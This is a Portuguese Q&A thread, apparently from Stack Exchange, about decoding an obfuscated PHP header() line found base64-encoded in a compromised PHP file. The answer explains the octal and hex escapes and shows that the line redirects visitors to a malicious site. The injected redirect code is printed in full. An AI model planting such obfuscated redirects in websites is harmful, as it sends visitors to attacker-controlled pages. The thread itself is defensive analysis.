Que tipo de codificação é essa?


2

Encontrei algum texto codificado em base64 em um arquivo php comprometido. Quando decodifiquei a string base64, era a seguinte diretiva:

header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");

Que tipo de codificação é essa string de URL? Pensei hex inicialmente, depois ascii, mas seu comprimento variável. Eu fiz o google, mas sem sucesso. Alguém pode me apontar na direção certa?

Respostas:


5

Aviso:

O URL abaixo vem de um site comprometido.

A visita beneficia financeiramente o invasor e pode danificar seu computador.

A cadeia significa

Refresh: 25; url="http://fcbarcelonadodocom.info/uk"

\145é o ponto de código 145 (octal), \x66é o ponto de código 66 (hexadecimal).

Verificar:

  1. Executar

    php
    
  2. Tipo

    <?php
        echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"";
    ?>
    
  3. Pressione Ctrl+ D.


Eu também tentei a string em Python, que imprimiu a mesma coisa. Apenas como uma opção alternativa para o OP. (Apenas var = "R \ 145 \ x66 ..." e imprima (var) em IDLE ou em qualquer outro local).
Nerdwaller 24/03
Ao utilizar nosso site, você reconhece que leu e compreendeu nossa Política de Cookies e nossa Política de Privacidade.
Licensed under cc by-sa 3.0 with attribution required.